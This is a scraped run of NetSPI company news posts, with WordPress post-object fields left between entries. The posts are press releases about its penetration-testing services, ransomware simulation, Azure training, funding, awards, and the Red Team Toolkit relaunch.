NetSPI’s new risk scoring capabilities dynamically integrate into PTaaS to provide both a granular vulnerability risk score as well as an aggregate risk score for an organization and its projects, assets, applications, and networks. Risk scoring is only available to NetSPI clients that leverage its penetration testing services.
The risk scores serve as a quantitative metric for risk reduction over time, cybersecurity spend validation, resource allocation, and industry benchmarking. NetSPI’s risk score enables organizations to incorporate business context and the respective threat landscape to accurately prioritize remediation of vulnerabilities.
“There are varying approaches to assigning vulnerability severity, but risk today extends far beyond individual vulnerabilities,” said Jake Reynolds, Head of Product at NetSPI. “The key is to recognize the risks most likely to disrupt the business, identify the threats that would increase those risks, and prioritize the most appropriate mitigations to protect your organization from those threats. NetSPI’s risk scoring does just that.”
According to Gartner[i], organizations with a risk-based vulnerability management program are expected to experience 80% fewer breaches. Download this whitepaper to learn how to use risk scoring to propel your risk-based vulnerability management program forward – and for a detailed overview of NetSPI’s risk score methodology.
“Reactive cybersecurity is a thing of the past. Security leaders must get proactive and take a risk-based approach to stay ahead of today’s adversaries,” said NetSPI President and CEO Aaron Shilts. “Our risk scores enable NetSPI clients to make proactive security decisions based on their unique risk factors. In other words, it allows them to confidently allocate budget and resources to the vulnerabilities that matter most.”
Learn more about PTaaS online here or contact us for a demo of NetSPI’s penetration testing and vulnerability management platform, Resolve™.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
On August 5, 2021, NetSPI was named Minne Inno's Blazer Award winner for the High Tech Company category:
After honoring 50 companies as Inno on Fire honorees, Minne Inno — the Business Journal’s news outlet focused on the startup scene — presents this year’s Blazer Award winners. The Blazer winners were selected from the 50 Fire honorees by a panel of judges who chose one company from each category that is lighting its industry on fire.
High Tech Company
NetSPI
NetSPI doubled down on talent and grew its team over the past year.
Earlier this summer, the Minneapolis-based cybersecurity firm added a ransomware attack simulation, in addition to its portfolio of penetration testing services.
“It was a good time for us, because we were already in the middle of disrupting an already stale industry,” Shilts said. “We moved fast, we over communicated, but more than anything, we just focused on taking care of our customers.”
Moving forward, NetSPI has plans to keep disrupting the industry without compromising quality.
“Cyber is still fast moving and very innovative, but when you’re really a disruptor and changing the way people consume a service, that gets everybody excited,” Shilts said.
[post_title] => NetSPI named a Minne Inno Blazer Award winner
[post_excerpt] => On August 5, 2021, NetSPI was named Minne Inno's Blazer Award winner for the High Tech Company category.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => minne-inno-blazer-award-winner
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:56
[post_modified_gmt] => 2022-12-16 16:51:56
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26129
[menu_order] => 250
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[62] => WP_Post Object
(
[ID] => 25909
[post_author] => 91
[post_date] => 2021-07-14 13:06:23
[post_date_gmt] => 2021-07-14 18:06:23
[post_content] =>
Celebrating the 35th class of unstoppable entrepreneurs who transform the Heartland Region and beyond.
Minneapolis, Minnesota – Ernst & Young LLP (EY US) announced that NetSPI CEO and President Aaron Shilts was named an Entrepreneur Of The Year® 2021 Heartland Award finalist. Now in its 35th year, the Entrepreneur Of The Year program honors unstoppable business leaders whose ambition, ingenuity and courage in the face of adversity help catapult us from the now to next and beyond.
Shilts was selected by a panel of independent judges. Award winners will be announced during a special virtual celebration on Tuesday, July 27, 2021, becoming lifetime members of an esteemed community of Entrepreneur Of The Year alumni from around the world.
Entrepreneur Of The Year is one of the preeminent competitive award programs for entrepreneurs and leaders of high-growth companies. The nominees are evaluated based on six criteria: entrepreneurial leadership; talent management; degree of difficulty; financial performance; societal impact and building a values-based company; and originality, innovation, and future plans. Since its launch, the program has expanded to recognize business leaders in more than 145 cities in over 60 countries around the world.
“This recognition validates the incredible work our team is doing,” said Shilts. “NetSPI team members operate as entrepreneurs every day and it’s an honor to help lead and support some of the most brilliant people in cybersecurity.”
Regional award winners are eligible for consideration for the Entrepreneur Of The Year National Awards, to be announced in November 2021 at the Strategic Growth Forum®, one of the nation’s most prestigious gatherings of high-growth, market-leading companies. The Entrepreneur Of The Year National Overall Award winner will then move on to compete for the EY World Entrepreneur Of The Year™ Award in June 2022.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
Sponsors
Founded and produced by Ernst & Young LLP, the Entrepreneur Of The Year Awards are nationally sponsored by SAP America and The Kauffman Foundation. In the Heartland Region sponsors also include Colliers International, Padilla, PNC Bank, SALO, LLC, and Twin Cities Business.
About Entrepreneur Of The Year®
Entrepreneur Of The Year® is the world’s most prestigious business awards program for unstoppable entrepreneurs. These visionary leaders deliver innovation, growth and prosperity that transform our world. The program engages entrepreneurs with insights and experiences that foster growth. It connects them with their peers to strengthen entrepreneurship around the world. Entrepreneur Of The Year is the first and only truly global awards program of its kind. It celebrates entrepreneurs through regional and national awards programs in more than 145 cities in over 60 countries. National Overall winners go on to compete for the EY World Entrepreneur Of The Year™ title. Visit ey.com/us/eoy
About EY Private
As Advisors to the ambitious™, EY Private professionals possess the experience and passion to support private businesses and their owners in unlocking the full potential of their ambitions. EY Private teams offer distinct insights born from the long EY history of working with business owners and entrepreneurs. These teams support the full spectrum of private enterprises including private capital managers and investors and the portfolio businesses they fund, business owners, family businesses, family offices and entrepreneurs. Visit ey.com/us/private
About EY
EY exists to build a better working world, helping create long-term value for clients, people and society and build trust in the capital markets.
Enabled by data and technology, diverse EY teams in over 150 countries provide trust through assurance and help clients grow, transform, and operate.
Working across assurance, consulting, law, strategy, tax, and transactions, EY teams ask better questions to find new answers for the complex issues facing our world today.
EY refers to the global organization, and may refer to one or more, of the member firms of Ernst & Young Global Limited, each of which is a separate legal entity. Ernst& Young Global Limited, a UK company limited by guarantee, does not provide services to clients. Information about how EY collects and uses personal data and a description of the rights individuals have under data protection legislation are available via ey.com/privacy. EY member firms do not practice law where prohibited by local laws. For more information about our organization, please visit ey.com.
[post_title] => EY US Announces NetSPI CEO Aaron Shilts as an Entrepreneur Of The Year 2021® Heartland Award Finalist
[post_excerpt] => The award celebrates unstoppable entrepreneurs who transform the Heartland Region and beyond.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => entrepreneur-of-the-year-2021-heartland-award-finalist
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:58
[post_modified_gmt] => 2022-12-16 16:51:58
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25909
[menu_order] => 257
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[63] => WP_Post Object
(
[ID] => 25827
[post_author] => 91
[post_date] => 2021-07-08 15:00:00
[post_date_gmt] => 2021-07-08 20:00:00
[post_content] =>
Las Vegas, Nevada – NetSPI, the leader in enterprise penetration testing and attack surface management, is attending Black Hat USA 2021 at the Mandalay Bay Convention Center in Las Vegas. This year, the hybrid event will be held in-person and online, featuring cybersecurity trainings, expert-led briefings, networking opportunities, and more. During the conference, the NetSPI team will feature its ransomware attack simulation service and will unveil new, innovative features added to its penetration testing and vulnerability management platform, Resolve™. Connect with NetSPI’s penetration testing and ransomware experts at the Black Hat Business Hall (in-person or virtually) at booth #1579.
Black Hat Business Hall (In-Person and Virtual) Meet the NetSPI team at booth #1579 to learn more about their expertise in enterprise penetration testing and attack surface management. Get a first look and demo of NetSPI’s new risk scoring feature and learn more about its ransomware attack simulation service. Bonus: Visit the in-person or virtual NetSPI booths for a chance to win a 128 GB Oculus Quest VR headset.
CANCELED: NetSPI Happy Hour at the Mandalay Bay Foundation Room NetSPI’s August 4 happy hour during Black Hat at the Mandalay Bay Foundation Room has been canceled to limit the spread of the COVID-19 Delta variant, following the latest CDC guidance. The ransomware session will now be available as a webinar on August 17. Register here: How to Build and Validate Ransomware Attack Detections.
When:
Black Hat In-Person: August 4, 2021 | 10am – 6pm PT August 5, 2021 | 10am – 4pm PT
Black Hat Virtual: August 4, 2021 | 8:30am – 5pm PT August 5, 2021 | 8:30am – 4pm PT
Where:
Black Hat In-Person Business Hall: Booth #1579 Mandalay Bay Convention Center Las Vegas, NV
Black Hat Virtual Business Hall: Booth #1579
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
About Black Hat
Founded in 1997, Black Hat is an internationally recognized cybersecurity event series providing the most technical and relevant information security research. Grown from a single annual conference to the most respected information security event series internationally, these multi-day events provide the security community with the latest cutting-edge research, developments, and trends.
[post_title] => NetSPI to Highlight Ransomware Resiliency, Risk-Based Vulnerability Management, and Penetration Testing as a Service During Black Hat 2021
[post_excerpt] => NetSPI attends Black Hat 2021 with a focus on ransomware, vulnerability management, and penetration testing as a service.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => black-hat-usa-2021
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:59
[post_modified_gmt] => 2022-12-16 16:51:59
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25827
[menu_order] => 260
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[64] => WP_Post Object
(
[ID] => 25619
[post_author] => 91
[post_date] => 2021-06-18 15:04:22
[post_date_gmt] => 2021-06-18 20:04:22
[post_content] =>
On June 18, 2021, NetSPI was recognized as a 2021 Fire Award winner.
The Fire Awards are always meant to be a celebration of the companies and people that keep Minnesota's tech and startup scene alive.
With this year's fourth annual Fire Awards, we want to celebrate even harder than ever before after one of the most trying years in memory. That's why we have the biggest Fire Awards ever, honoring 50 companies from across the state.
We sourced these Fire winners from our readers and added some companies that have made waves in the past year or are on the precipice of big things. Many companies were honored because of the steps they took to help tackle the Covid-19 pandemic.
In July, a Blazer winner will be selected from each category by a panel of judges. Blazer winners are the hottest companies in each category, deserving some extra recognition. More details about that event will come out later this month.
We've honored companies in a variety of categories. Startup of the Year is the startup that has risen above the rest in the past year, while the Growing Companies category is for those companies that are a bit smaller but show the potential to be a Startup of the Year down the road. We're also honoring the organizations that support our ecosystem with the community builder category, as well as a few specific industries like medical devices and health and wellness.
Let's meet our Fire winners!
High Tech Company:
NetSPI is a Minneapolis-based cybersecurity company that specializes in penetration testing, which is sometimes called ethical hacking. In May, it raised $90 million in venture capital. Its clients include Fortune 500 companies like Medtronic and Microsoft.
Digi Key is an electronics distributor and one of Minnesota's largest private companies. The Theif River Falls-based company helped the University of Minnesota produce the Coventor, a jerry-rigged ventilator that helped address ventilator shortages during the Covid-19 pandemic.
Arctic Wolf is a transplanted unicorn cybersecurity company. Founded in Silicon Valley, it moved to Eden Prairie in 2020 at the same time it announced a $200 million round of venture capital funding at a valuation of over $1 billion.
Lucy, also known as Equals3, is a Minneapolis-based AI firm that helps Fortune 500 clients manage their data. It raised $3 million in June and plans to double its employee base to over 50 by the end of the year.
Carrot Health is a Minneapolis-based firm that collects consumer data for health plans to help them address what are known as the social determinants of health, or environmental factors that affect people's health. It has been experiencing 100% growth since it was founded.
[post_title] => Minne Inno announces the 2021 Fire Awards
[post_excerpt] => On June 18, 2021, NetSPI was recognized as a 2021 Fire Award winner.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => minne-inno-announces-the-2021-fire-awards
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:52:01
[post_modified_gmt] => 2022-12-16 16:52:01
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25619
[menu_order] => 266
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[65] => WP_Post Object
(
[ID] => 25599
[post_author] => 91
[post_date] => 2021-06-17 08:00:00
[post_date_gmt] => 2021-06-17 13:00:00
[post_content] =>
Through the tech-enabled service, organizations can put their ransomware prevention and detection capabilities to the test.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced its new ransomware attack simulation service. In collaboration with its ransomware security experts, the new service enables organizations to emulate real world ransomware families to find and fix critical vulnerabilities in their cybersecurity defenses.
Recent ransomware attacks have exposed major cybersecurity gaps globally. In the U.S., the Biden administration is urging business leaders to take immediate steps to prepare for ransomware attacks. In a recent memo, deputy national security advisor for cyber and emerging technology Anne Neuberger recommends organizations, “use a third-party pentester to test the security of your systems and your ability to defend against a sophisticated [ransomware] attack.”
“Paying a ransom doesn’t guarantee your data is returned safely, yet, one in four companies worldwide pay the adversariesI,” said Scott Sutherland, Practice Director at NetSPI. “Organizations must get more proactive with their security efforts to avoid paying the ransom and funding the cybercriminals. Ransomware families are both opportunistic and targeted – and no industry is exempt from falling victim to an attack.”
“NetSPI is eager to help organizations achieve a more scalable and continuous assessment of their environment from the perspective of an adversary,” said Charles Horton, COO at NetSPI. “The addition of the ransomware attack simulation service to our adversary simulation solutions will further help organizations strengthen their defenses and become more resilient against ransomware attacks.”
During a ransomware attack simulation engagement, NetSPI closely collaborates with organizations to simulate sophisticated ransomware tactics, techniques, and procedures (TTPs) using its custom-built breach and attack simulation technology. Following each engagement, organizations gain access to NetSPI’s technology to run custom plays on their own and continuously evaluate how well their cybersecurity program will hold up to a ransomware attack.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => Improve Ransomware Attack Resiliency with NetSPI’s New Ransomware Attack Simulation
[post_excerpt] => Learn how NetSPI's new ransomware attack simulation service enables organizations to find and fix critical vulnerabilities in their ransomware defenses.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => ransomware-attack-resiliency
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:52:02
[post_modified_gmt] => 2022-12-16 16:52:02
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25599
[menu_order] => 267
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[66] => WP_Post Object
(
[ID] => 25593
[post_author] => 91
[post_date] => 2021-06-16 22:48:57
[post_date_gmt] => 2021-06-17 03:48:57
[post_content] =>
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the Top Workplaces in Minnesota by the Star Tribune. Top Workplaces recognizes the most progressive companies in Minnesota based on employee opinions measuring engagement, organizational health, and satisfaction.
“NetSPI wouldn’t be what it is today without its employees and the culture of innovation that we’ve built,” said NetSPI President and CEO Aaron Shilts. “Even during a turbulent 2020, we had an employee retention rate of 92% which alone speaks volumes in an industry that has zero percent unemployment. I thank each and every member of our team for helping to make NetSPI a Top Workplace.”
The results of the Star Tribune Top Workplaces are based on survey information collected by Energage, an independent company specializing in employee engagement and retention. The analysis includes responses from over 76,000 employees at Minnesota public, private and nonprofit organizations.
“We are especially proud of the fact that our employees called out NetSPI’s top strengths as interdepartmental cooperation, execution, and innovation. This award shows how well our teams work together, which is a key to our success,” said NetSPI Director of People Operations Heather Neumeister. “Seeing the variety of responses throughout the survey really validates the culture we have at NetSPI. Working with great people, doing important work, and having fun came through in many of the comments provided.”
This Top Workplace recognition follows an especially successful 12 months for NetSPI. Recently, NetSPI announced it raised $90 million in growth funding led by KKR, with participation from Ten Eleven Ventures. In 2020, NetSPI acquired Silent Break Security and incorporated its proprietary Adversary Simulation and Red Team Toolkit software into the company’s offensive cyber security and attack surface management offerings. NetSPI also launched Penetration Testing as a Service (PTaaS) in 2020, powered by its Resolve™ platform. 2021 also promises more business opportunities for NetSPI with upcoming additions of risk scoring, vulnerability intelligence, ransomwareattack simulation, and more.
To qualify for the Star Tribune Top Workplaces, a company must have more than 50 employees in Minnesota. Nearly 3,000 companies were invited to participate. Rankings were composite scores calculated purely on the basis of employee responses.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Tool Kit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
Media Contacts: Elyse Bauchle, Maccabee PR for NetSPI elyse@maccabee.com (612) 294-3125
[post_title] => NetSPI Named a 2021 Top Workplace in Minnesota
[post_excerpt] => Learn why NetSPI was named a 2021 top workplace in Minnesota by the Star Tribune.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => top-workplaces-minnesota-2021
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:52:02
[post_modified_gmt] => 2022-12-16 16:52:02
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25593
[menu_order] => 268
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[67] => WP_Post Object
(
[ID] => 25552
[post_author] => 91
[post_date] => 2021-06-10 05:00:00
[post_date_gmt] => 2021-06-10 10:00:00
[post_content] =>
The new training course provides a deep dive on the attack surface introduced by Azure and how to exploit its vulnerabilities.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced Dark Side Ops (DSO) 3: Azure Cloud Pentesting, a new cybersecurity training course focused on Azure cloud penetration testing. Participants will gain a better understanding of potential risks associated with Azure cloud deployments, how to exploit them, and how to prevent and remediate critical cloud vulnerabilities.
As experts anticipateI cloud adoption to soar in the aftermath of the COVID-19 pandemic, this course helps cybersecurity, DevOps, and IT professionals better grasp the complexities that accompany Microsoft’s Azure cloud platform. The first public DSO 3: Azure Cloud Pentesting training is scheduled for August 23-24, 2021 and will be conducted virtually. The two-day training session costs $2,000/person.
“It’s no surprise that cloud security was listed as the most important skill needed to pursue a cybersecurity career in the latest (ISC)2 Cybersecurity Workforce StudyII,” said Aaron Shilts, President and CEO at NetSPI. “An emphasis on cloud security education and training is critical as the attack surface grows.”
“Not only does DSO 3: Azure Cloud Pentesting feature a live cloud environment and real-world examples from our extensive cloud penetration testing work, it is also designed and instructed by NetSPI practice director Karl Fosaaen, one of the foremost experts on Azure penetration testing,” Shilts added.
“Traditional network penetration testing processes need to be updated to account for the intricacies introduced by cloud infrastructure,” said Karl Fosaaen, Cloud Practice Director at NetSPI. “Through the training, I’m eager to teach others how level up their on-premise penetration testing skills and apply them to Azure cloud.”
NetSPI’s Dark Side Ops trainings, DSO 1: Malware Dev, DSO 2: Adversary Simulation, and DSO 3: Azure Cloud Pentesting are available as private trainings, upon request. Contact NetSPI for more information regarding private group training sessions.
For additional training details and course requirements, visit the NetSPI website. Registration is now open for all August 2021 DSO cybersecurity training courses.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
Investment to Fuel Innovation and Growth, Including Global Expansion and Product Innovation
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced it has raised $90 million in growth funding led by KKR, with participation from Ten Eleven Ventures. The investment will be used to further accelerate NetSPI’s rapid growth by expanding the company’s cyber security and client experience teams, investing in product innovation, and deepening operations across U.S. and international markets.
“The reality is that cyber security attacks today are inevitable and put organizations at grave risk,” said NetSPI President and Chief Executive Officer Aaron Shilts. “At NetSPI, we strive to stay one step ahead of hackers, breaches, and bad actors by focusing on prevention-based security techniques. Rooted in the founding tenets of the company, our goals are purposely aggressive to help our clients adapt to the constantly evolving threat landscape.”
Since its founding, NetSPI has focused its services to help companies proactively defend themselves from cyberattacks through a robust and innovative technology platform, allowing NetSPI’s team of experts to thoroughly identify security vulnerabilities. At a time when cyber security spending is expected to exceed $200 billion per year by 2024, according to a recent Bloomberg Intelligence (BI) report, more companies are preparing to fend off sophisticated cyber-attacks and avoid reputational and business risks.
“Our clients rely on us to help secure their ever-evolving attack surface by leveraging our expertise in cloud, red team, application, and network security,” continued Shilts. “This investment from KKR and Ten Eleven Ventures allows NetSPI to better meet this demand while simultaneously fueling growth and innovation as a leader in the booming cyber security market. With our investors’ support, NetSPI will continue to transform the industry with a focus on attack surface management, enterprise security testing, and vulnerability management.”
“NetSPI has built a differentiated suite of tech-enabled services and test orchestration and reporting software that is not only enhancing cyber security for complex global enterprises across a wide range of industries, but is simultaneously disrupting the traditional penetration testing market in order for these enterprises to continuously test their applications, networks, and cloud infrastructures at scale,” said Ben Pederson, Principal at KKR. “We are excited to invest in NetSPI’s growth as they build and deliver these critically important offensive security solutions.”
Jake Heller, Head of KKR’s Technology Growth team in the Americas, added: “Aaron and his team have a deep appreciation for the needs of their customers and the increasing demand for best-in-class, tech-enabled cyber security systems.”
KKR is investing in NetSPI through its Next Generation Technology Growth Fund II. KKR and Ten Eleven Ventures have invested in market-leading cyber security companies including Darktrace, KnowBe4, Ping Identity, Cylance, ForgeRock, and ReliaQuest.
“Penetration testing is a critical component of any enterprise’s security program and will continue to be an important part of compliance and regulatory requirements in the future,” said Mark Hatfield, General Partner, Ten Eleven Ventures. “With its deep expertise and automated platform, NetSPI has developed an incredibly effective and efficient approach to penetration testing and attack surface management. We’re thrilled to partner with this exceptional team and look forward to drawing on our cyber security expertise to help NetSPI bring its technology to more companies across the globe.”
After spending its first several years as a bootstrapped, profitable business, in 2017 NetSPI partnered with Sunstone Partners, who has been instrumental to the company’s growth post-investment. Gus Alberelli, Managing Director of Sunstone Partners, said: “We’re incredibly fortunate to partner with NetSPI’s team and proud of the company’s extraordinary growth stemming from its technology-enabled penetration testing team. We are excited for KKR and Ten Eleven Ventures to join Sunstone Partners in supporting NetSPI’s growth journey.”
The investment is the latest transaction in a period of accelerated growth for NetSPI. Most recently, NetSPI acquired Silent Break Security and incorporated its proprietary Adversary Simulation and Red Team Toolkit software into the company’s offensive cyber security and attack surface management offerings. In 2020, NetSPI launched Penetration Testing as a Service (PTaaS) powered by its Resolve™ platform. Upcoming additions of risk scoring, vulnerability intelligence, breach and attack simulation, and more will continue to differentiate NetSPI's technology offerings.
Goodwin Procter LLP advised NetSPI on the transaction and Latham & Watkins LLP advised KKR and Ten Eleven Ventures.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Tool Kit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
About KKR
KKR is a leading global investment firm that offers alternative asset management and capital markets and insurance solutions. KKR aims to generate attractive investment returns by following a patient and disciplined investment approach, employing world-class people, and supporting growth in its portfolio companies and communities. KKR sponsors investment funds that invest in private equity, credit and real assets and has strategic partners that manage hedge funds. KKR’s insurance subsidiaries offer retirement, life, and reinsurance products under the management of The Global Atlantic Financial Group. References to KKR’s investments may include the activities of its sponsored funds and insurance subsidiaries. For additional information about KKR & Co. Inc. (NYSE: KKR), please visit KKR’s website at www.kkr.com and on Twitter @KKR_Co.
About Ten Eleven Ventures
Ten Eleven Ventures is the original venture capital firm focused solely on investing in digital security. The firm invests globally and at all stages, from seed to growth (the latter via its Joint Investment Alliance with KKR). Since its founding in Silicon Valley in 2015, Ten Eleven Ventures has raised nearly $US 500 million and invested in 30 leading cybersecurity companies including KnowBe4, Darktrace, Twistlock, Verodin, Cylance, and Ping Identity. For more information, please visit www.1011vc.com or follow us on Twitter @1011vc.
About Sunstone Partners
Sunstone Partners is a growth-oriented private equity firm that makes majority and minority investments in technology-enabled services and software businesses. Recently recognized as one of Inc.’s 2020 PE 50 founder-friendly private equity firms for entrepreneurs, the firm seeks to partner with exceptional management teams, often as their first institutional capital partner, to help accelerate organic growth and fund acquisitions. Founded in 2015, the firm has $800 million of committed capital to its first two funds. For more information, visit www.sunstonepartners.com.
Media Contacts: Jean Hill, Maccabee PR for NetSPI jean@maccabee.com (612) 294-3154
KKR Cara Major or Miles Radcliffe-Trenner Media@KKR.com (212) 750-8300
On May 12, 2021, NetSPI announced new funding from KKR and Ten Eleven. Learn why Ten Eleven chose to invest in NetSPI:
Today we’re pleased to announce our investment in NetSPI. In cybersecurity, understanding where weaknesses lie is a critical first step in defense. One crucial way to assess this is through penetration testing, where “ethical hackers” attempt to break into your systems before attackers can. Penetration testing is often required of technology vendors by their customers and a mandated part of certain required compliance programs and certifications, including SOC 2. Because of its importance, pen testing represents a $1.7Bn market growing at 22% a year – but companies are always looking for a way to do it in a faster and easier manner.
[post_title] => Ten Eleven: Why We Invested in NetSPI
[post_excerpt] => On May 12, 2021, NetSPI announced new funding from KKR and Ten Eleven. Learn why Ten Eleven chose to invest in NetSPI.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => ten-eleven-why-we-invested-in-netspi
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:50:52
[post_modified_gmt] => 2022-12-16 16:50:52
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25347
[menu_order] => 281
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[70] => WP_Post Object
(
[ID] => 23017
[post_author] => 91
[post_date] => 2021-02-09 07:00:16
[post_date_gmt] => 2021-02-09 07:00:16
[post_content] =>
NetSPI’s toolkit for covert adversary simulations isnow available to enterprise red teams with new features and functionality.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today relaunched Red Team Toolkit, a sophisticated suite of penetration testing and adversary simulation tools. NetSPI integrated and advanced the Toolkit after the acquisition of Silent Break Security in late 2020. It features a re-designed web-based user experience and improved functionality that supports more advanced and collaborative red team operations.
“We designed the all-new Red Team Toolkit Platform to better emulate sophisticated, real-world attackers after observing critical gaps left by other well-signatured tools on the market,” said Brady Bloxham, Chief Technology Officer at NetSPI. “We continue to use the platform on our own red team operations and are constantly updating it with the latest offensive techniques and defensive countermeasures. It is the most capable offensive toolkit available to red teamstoday.”
Red Team Toolkit’s tooling and features include:
Slingshot: Slingshot is a Windows post-exploitation agent used by red teams to conduct advanced network cyber-operations. Designed with stealth in mind, it enables operators to accurately emulate sophisticated adversaries. It increases the speed and efficiency of advanced operations through malleable network profiles, direct syscall execution, memory obfuscation, blended HTML traffic, scripting automation interface, and more.
Improved user experience: Its new web-based user interface was built with the operator experience and productivity top of mind. It is a command and control (C2) server, providing a unified interface for all current and future tools.
Multi-user support: The all-new Red Team Toolkit Platform supports multi-user interaction with tiered access permissions. This provides mirrored output, improved team collaboration, seamless operations, and training opportunities.
Keyboard-centric controls: Inspired by a traditional terminal, red teamers will feel at home with keyboard-centric controls and an integrated command palette.
Functional storage: Connect Red Team Toolkit to your existing database infrastructure or a simple SQLite file. Everything is well-formed, easily parsed, and recorded in one central location.
“Our teams think like adversaries and perform red teaming for some of the most advanced organizations in the world,” said Aaron Shilts, President and CEO of NetSPI. “We take pride in building technology that change how our clients think about their penetration testing programs and the industry as a whole - and we are thrilled to make it available to others with the reintroduction of Red Team Toolkit.”
Learn more about how Red Team Toolkit can optimize your Red Team engagements and increase productivity. Contact sales@netspi.com.
